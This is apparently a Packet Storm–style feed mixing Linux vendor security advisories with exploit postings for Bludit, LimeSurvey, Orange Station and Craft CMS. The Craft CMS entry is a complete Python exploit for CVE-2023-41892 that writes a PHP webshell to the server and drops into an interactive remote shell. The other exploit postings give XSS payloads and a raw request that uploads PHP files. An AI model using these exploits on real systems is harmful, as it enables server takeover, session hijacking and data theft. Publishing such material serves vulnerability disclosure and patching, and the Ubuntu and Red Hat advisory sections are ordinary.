Bludit version 3.13.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bludit 3.13.0 - Cross Site Scripting (XSS)#Exploit Author: Gökhan ŞENŞÜKÜR# Date: 29/02/2024# Vendor Homepage: https://www.bludit.com# Software Link: https://www.bludit.com/releases/bludit-3-13-0.zip# Version: bludit-3-13-0# Tested on: WindowsTECHNICAL DETAILS & POC========================================### Steps to reproduce1.⁠ ⁠Open page http://localhost:test/admin/;2.⁠ ⁠Enter username as `⁠ admin"><img src=x onerror=alert(1)> ⁠`3.⁠ ⁠U can see pop up### HTTP Request  ###POST /test/admin/ HTTP/1.1Host: localhostContent-Length: 139Cache-Control: max-age=0sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/admin/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: BLUDIT-KEY=9951a5o12g66e4c9aill39ul4pConnection: closetokenCSRF=d39d816df2972798da8c5be0b0b944cfc5163938&username=%60%60admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%60%60&password=&save=

Bludit 3.13.0 Cross Site Scripting

Craft CMS version 4.4.14 suffers from an unauthenticated remote code execution vulnerability.

    #!/usr/bin/env python3#coding: utf-8# Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE)# Date: 2023-12-26# Version: 4.0.0-RC1 - 4.4.14# Vendor Homepage: https://craftcms.com/# Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14# Tested on: Ubuntu 22.04.3 LTS# Tested on: Craft CMS 4.4.14# Exploit Author: Olivier Lasne# CVE : CVE-2023-41892# References :# https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g# https://blog.calif.io/p/craftcms-rceimport requestsimport sys, reif(len(sys.argv) < 2):    print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m")    exit()HOST = sys.argv[1]if not re.match('^https?://.*', HOST):    print("\033[1;31m[-]\033[0m URL should start with http or https")    exit()print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos")## Execute phpinfo() and extract config info from the websiteurl = HOST + '/index.php'content_type = {'Content-Type': 'application/x-www-form-urlencoded'}data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}'try:    r = requests.post(url, headers=content_type, data=data)except:    print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}")    exit()# If we succeed, we should have default phpinfo credits if not 'PHP Group' in r.text:  print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.')  exit()# Extract config value for tmp_dir and document_rootpattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>'pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>'tmp_dir       = re.search(pattern1, r.text, re.DOTALL).group(1)document_root = re.search(pattern2, r.text, re.DOTALL).group(1)if 'no value' in tmp_dir:  tmp_dir = '/tmp'print(f'temporary directory: {tmp_dir}')print(f'web server root: {document_root}')## Create shell.php in tmp_dirdata = {    "action": "conditions/render",    "configObject[class]": "craft\elements\conditions\ElementCondition",    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}'}files = {    "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?>    <image>    <read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/>    <write filename="info:DOCUMENTROOT/shell.php"/>    </image>""".replace("DOCUMENTROOT", document_root), "text/plain")}print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}')r = requests.post(url, data=data, files=files) #, proxies={'http' : 'http://127.0.0.1:8080'}) #  # Use the Imagick trick to move the webshell in DOCUMENT_ROOTdata = {    "action": "conditions/render",    "configObject[class]": r"craft\elements\conditions\ElementCondition",    "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}'}print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}')r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})if r.status_code != 502:    print("\033[1;31m[-]\033[0m Exploit failed")    exit()print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami")print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n")print("\033[1;92m[!]\033[0m Enjoy your shell\n")url = HOST + '/shell.php'## Pseudo Shellwhile True:    command = input('\033[1;96m>\033[0m ')    if command == 'exit':        exit()    if command == 'clear' or command == 'cls':        print('\n' * 100)        print('\033[H\033[3J', end='')        continue    data = {'cmd' : command}    r = requests.post(url, data=data) #, proxies={"http": "http://127.0.0.1:8080"})    # exit if we have an error    if r.status_code != 200:        print(f"Error: status code {r.status_code} for {url}")        exit()    res_command = r.text    res_command = re.sub('^caption:', '', res_command)    res_command = re.sub(' CAPTION.*$', '', res_command)    print(res_command, end='')

Craft CMS 4.4.14 Remote Code Execution

Ubuntu Security Notice 6707-3 - Lonial Con discovered that the netfilter subsystem in the Linux kernel did not properly handle element deactivation in certain cases, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Notselwyn discovered that the netfilter subsystem in the Linux kernel did not properly handle verdict parameters in certain cases, leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6707-3March 25, 2024linux-aws, linux-aws-6.5 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-aws-6.5: Linux kernel for Amazon Web Services (AWS) systemsDetails:Lonial Con discovered that the netfilter subsystem in the Linux kernel didnot properly handle element deactivation in certain cases, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-1085)Notselwyn discovered that the netfilter subsystem in the Linux kernel didnot properly handle verdict parameters in certain cases, leading to a use-after-free vulnerability. A local attacker could use this to cause a denialof service (system crash) or possibly execute arbitrary code.(CVE-2024-1086)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - Network drivers;   - PWM drivers;(CVE-2024-26597, CVE-2024-26599)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   linux-image-6.5.0-1016-aws      6.5.0-1016.16   linux-image-aws                 6.5.0.1016.16Ubuntu 22.04 LTS:   linux-image-6.5.0-1016-aws      6.5.0-1016.16~22.04.1   linux-image-aws                 6.5.0.1016.16~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6707-3   https://ubuntu.com/security/notices/USN-6707-1   CVE-2024-1085, CVE-2024-1086, CVE-2024-26597, CVE-2024-26599Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/6.5.0-1016.16   https://launchpad.net/ubuntu/+source/linux-aws-6.5/6.5.0-1016.16~22.04.1

Ubuntu Security Notice USN-6707-3

Red Hat Security Advisory 2024-1491-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include integer overflow, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1491.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: firefox security update  
Advisory ID:        RHSA-2024:1491-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1491  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-5388  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.9.1 ESR.

Security Fix(es):

* nss: timing attack against RSA decryption (CVE-2023-5388)

* Mozilla: Crash in NSS TLS method (CVE-2024-0743)

* Mozilla: JIT code failed to save return registers on Armv7-A (CVE-2024-2607)

* Mozilla: Integer overflow could have led to out of bounds write (CVE-2024-2608)

* Mozilla: Improve handling of out-of-memory conditions in ICU (CVE-2024-2616)

* Mozilla: Improper handling of html and body tags enabled CSP nonce leakage (CVE-2024-2610)

* Mozilla: Clickjacking vulnerability could have led to a user accidentally granting permissions (CVE-2024-2611)

* Mozilla: Self referencing object could have potentially led to a use-after-free (CVE-2024-2612)

* Mozilla: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (CVE-2024-2614)

* Mozilla: Privileged JavaScript Execution via Event Handlers (CVE-2024-29944)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5388

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243644  
https://bugzilla.redhat.com/show_bug.cgi?id=2260012  
https://bugzilla.redhat.com/show_bug.cgi?id=2270660  
https://bugzilla.redhat.com/show_bug.cgi?id=2270661  
https://bugzilla.redhat.com/show_bug.cgi?id=2270662  
https://bugzilla.redhat.com/show_bug.cgi?id=2270663  
https://bugzilla.redhat.com/show_bug.cgi?id=2270664  
https://bugzilla.redhat.com/show_bug.cgi?id=2270665  
https://bugzilla.redhat.com/show_bug.cgi?id=2270666  
https://bugzilla.redhat.com/show_bug.cgi?id=2271064

Red Hat Security Advisory 2024-1491-03

Red Hat Security Advisory 2024-1490-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include integer overflow, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1490.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: firefox security update  
Advisory ID:        RHSA-2024:1490-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1490  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-5388  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.9.1 ESR.

Security Fix(es):

* nss: timing attack against RSA decryption (CVE-2023-5388)

* Mozilla: Crash in NSS TLS method (CVE-2024-0743)

* Mozilla: JIT code failed to save return registers on Armv7-A (CVE-2024-2607)

* Mozilla: Integer overflow could have led to out of bounds write (CVE-2024-2608)

* Mozilla: Improve handling of out-of-memory conditions in ICU (CVE-2024-2616)

* Mozilla: Improper handling of html and body tags enabled CSP nonce leakage (CVE-2024-2610)

* Mozilla: Clickjacking vulnerability could have led to a user accidentally granting permissions (CVE-2024-2611)

* Mozilla: Self referencing object could have potentially led to a use-after-free (CVE-2024-2612)

* Mozilla: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (CVE-2024-2614)

* Mozilla: Privileged JavaScript Execution via Event Handlers (CVE-2024-29944)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5388

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243644  
https://bugzilla.redhat.com/show_bug.cgi?id=2260012  
https://bugzilla.redhat.com/show_bug.cgi?id=2270660  
https://bugzilla.redhat.com/show_bug.cgi?id=2270661  
https://bugzilla.redhat.com/show_bug.cgi?id=2270662  
https://bugzilla.redhat.com/show_bug.cgi?id=2270663  
https://bugzilla.redhat.com/show_bug.cgi?id=2270664  
https://bugzilla.redhat.com/show_bug.cgi?id=2270665  
https://bugzilla.redhat.com/show_bug.cgi?id=2270666  
https://bugzilla.redhat.com/show_bug.cgi?id=2271064

Red Hat Security Advisory 2024-1490-03

LimeSurvey Community version 5.3.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey CommunityEdition Version 5.3.32+220817# Exploit Author: Subhankar Singh# Date: 2024-02-03# Vendor: LimeSurvey# Software Link: https://community.limesurvey.org/releases/# Version: LimeSurvey Community Edition Version 5.3.32+220817# Tested on: Windows (Client)# CVE: CVE-2024-24506## Description:A critical security vulnerability exists in LimeSurvey Community EditionVersion 5.3.32+220817, particularly in the "General Setting"functionality's "Administrator email address:" field. This allows anattacker to compromise the super-admin account, leading to potential theftof cookies and session tokens.## Background:Cross-site scripting (XSS) is a common web security vulnerability thatcompromises user interactions with a vulnerable application. Stored XSSoccurs when user input is stored in the application and executed whenever auser triggers or visits the page.## Issue:LimeSurvey fails to properly validate user-supplied input on both clientand server sides, despite some protective measures. The "Administratoremail address:" field within the "General Setting" functionality permitsthe insertion of special characters, enabling the injection of maliciousJavaScript payloads. These payloads are stored in the database and executedwhen the user saves or reloads the page.## Steps To Reproduce:1. Log into the LimeSurvey application.2. Navigate to the general settings.3. Insert the following JavaScript payload in the "Administrator emailaddress:" field:Payload: `abcxyz@gmail.com"><u>s</u><svgonload=confirm(document.domain)>`## Expected Result:The LimeSurvey application should display an alert with the domain afterclicking save and reloading the page.## Actual Result:The LimeSurvey application is vulnerable to Stored Cross-Site Scripting, asevidenced by the successful execution of the injected payload.## Proof of Concept:Attached Screenshots for the reference.

LimeSurvey Community 5.3.32 Cross Site Scripting

Orange Station version 1.0 suffers from a remote shell upload vulnerability.

## Title: ORANGE STATION-1.0 File Upload Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 03/26/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload,  
https://www.bugcrowd.com/glossary/remote-code-execution-rce/

## Description:  
The parameters back_login_image, login_image, invoice_image, and  
website_image in the manage_website.php application are vulnerable for  
File Upload and the server is vulnerable for Remote code execution  
after this.  
The attacker who has credentials to this system can upload any PHP  
file and he can destroy the system or he can steal a very  
sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

## Exploit:  
```POST  
POST /garage/garage/manage_website.php HTTP/1.1  
Host: pwnedhost.com  
Cookie: PHPSESSID=gu6415ln5mmjknq4ofn8tkab0n  
Content-Length: 1871  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: https://pwnedhost.com  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryytBZTydZ8OfOJjda  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://pwnedhost.com/garage/garage/manage_website.php  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
Connection: close

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="title"

Orange Station  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="footer"

Admin PanelÃ‚Â  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="short_title"

9090909090  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_code"

Shivaji Nagar, Nashik  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="currency_symbol"

Ã¢â€šÂ¹  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_website_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="website_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_invoice_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="invoice_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_login_image"

logo.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="login_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="old_back_login_image"

service.jpg  
------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="back_login_image"; filename="info.php"  
Content-Type: application/octet-stream

<?php  
  phpinfo();  
?>

------WebKitFormBoundaryytBZTydZ8OfOJjda  
Content-Disposition: form-data; name="btn_web"

------WebKitFormBoundaryytBZTydZ8OfOJjda--  
```

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/orange-station-10-multiple-file-upload.html)

## Time spent:  
00:27:00

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and  
https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
                          nu11secur1ty <http://nu11secur1ty.com/>

Orange Station 1.0 Shell Upload

Red Hat Security Advisory 2024-1489-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include integer overflow, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1489.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: firefox security update  
Advisory ID:        RHSA-2024:1489-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1489  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-5388  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.9.1 ESR.

Security Fix(es):

* nss: timing attack against RSA decryption (CVE-2023-5388)

* Mozilla: Crash in NSS TLS method (CVE-2024-0743)

* Mozilla: JIT code failed to save return registers on Armv7-A (CVE-2024-2607)

* Mozilla: Integer overflow could have led to out of bounds write (CVE-2024-2608)

* Mozilla: Improve handling of out-of-memory conditions in ICU (CVE-2024-2616)

* Mozilla: Improper handling of html and body tags enabled CSP nonce leakage (CVE-2024-2610)

* Mozilla: Clickjacking vulnerability could have led to a user accidentally granting permissions (CVE-2024-2611)

* Mozilla: Self referencing object could have potentially led to a use-after-free (CVE-2024-2612)

* Mozilla: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (CVE-2024-2614)

* Mozilla: Privileged JavaScript Execution via Event Handlers (CVE-2024-29944)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5388

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243644  
https://bugzilla.redhat.com/show_bug.cgi?id=2260012  
https://bugzilla.redhat.com/show_bug.cgi?id=2270660  
https://bugzilla.redhat.com/show_bug.cgi?id=2270661  
https://bugzilla.redhat.com/show_bug.cgi?id=2270662  
https://bugzilla.redhat.com/show_bug.cgi?id=2270663  
https://bugzilla.redhat.com/show_bug.cgi?id=2270664  
https://bugzilla.redhat.com/show_bug.cgi?id=2270665  
https://bugzilla.redhat.com/show_bug.cgi?id=2270666  
https://bugzilla.redhat.com/show_bug.cgi?id=2271064

Red Hat Security Advisory 2024-1489-03

Red Hat Security Advisory 2024-1488-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include integer overflow, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1488.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: firefox security update  
Advisory ID:        RHSA-2024:1488-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1488  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-5388  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.9.1 ESR.

Security Fix(es):

* nss: timing attack against RSA decryption (CVE-2023-5388)

* Mozilla: Crash in NSS TLS method (CVE-2024-0743)

* Mozilla: JIT code failed to save return registers on Armv7-A (CVE-2024-2607)

* Mozilla: Integer overflow could have led to out of bounds write (CVE-2024-2608)

* Mozilla: Improve handling of out-of-memory conditions in ICU (CVE-2024-2616)

* Mozilla: Improper handling of html and body tags enabled CSP nonce leakage (CVE-2024-2610)

* Mozilla: Clickjacking vulnerability could have led to a user accidentally granting permissions (CVE-2024-2611)

* Mozilla: Self referencing object could have potentially led to a use-after-free (CVE-2024-2612)

* Mozilla: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (CVE-2024-2614)

* Mozilla: Privileged JavaScript Execution via Event Handlers (CVE-2024-29944)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5388

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243644  
https://bugzilla.redhat.com/show_bug.cgi?id=2260012  
https://bugzilla.redhat.com/show_bug.cgi?id=2270660  
https://bugzilla.redhat.com/show_bug.cgi?id=2270661  
https://bugzilla.redhat.com/show_bug.cgi?id=2270662  
https://bugzilla.redhat.com/show_bug.cgi?id=2270663  
https://bugzilla.redhat.com/show_bug.cgi?id=2270664  
https://bugzilla.redhat.com/show_bug.cgi?id=2270665  
https://bugzilla.redhat.com/show_bug.cgi?id=2270666  
https://bugzilla.redhat.com/show_bug.cgi?id=2271064

Red Hat Security Advisory 2024-1488-03

Red Hat Security Advisory 2024-1487-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include integer overflow, out of bounds write, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1487.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: firefox security update  
Advisory ID:        RHSA-2024:1487-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1487  
Issue date:         2024-03-26  
Revision:           03  
CVE Names:          CVE-2023-5388  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.9.1 ESR.

Security Fix(es):

* nss: timing attack against RSA decryption (CVE-2023-5388)

* Mozilla: Crash in NSS TLS method (CVE-2024-0743)

* Mozilla: JIT code failed to save return registers on Armv7-A (CVE-2024-2607)

* Mozilla: Integer overflow could have led to out of bounds write (CVE-2024-2608)

* Mozilla: Improve handling of out-of-memory conditions in ICU (CVE-2024-2616)

* Mozilla: Improper handling of html and body tags enabled CSP nonce leakage (CVE-2024-2610)

* Mozilla: Clickjacking vulnerability could have led to a user accidentally granting permissions (CVE-2024-2611)

* Mozilla: Self referencing object could have potentially led to a use-after-free (CVE-2024-2612)

* Mozilla: Memory safety bugs fixed in Firefox 124, Firefox ESR 115.9, and Thunderbird 115.9 (CVE-2024-2614)

* Mozilla: Privileged JavaScript Execution via Event Handlers (CVE-2024-29944)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5388

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2243644  
https://bugzilla.redhat.com/show_bug.cgi?id=2260012  
https://bugzilla.redhat.com/show_bug.cgi?id=2270660  
https://bugzilla.redhat.com/show_bug.cgi?id=2270661  
https://bugzilla.redhat.com/show_bug.cgi?id=2270662  
https://bugzilla.redhat.com/show_bug.cgi?id=2270663  
https://bugzilla.redhat.com/show_bug.cgi?id=2270664  
https://bugzilla.redhat.com/show_bug.cgi?id=2270665  
https://bugzilla.redhat.com/show_bug.cgi?id=2270666  
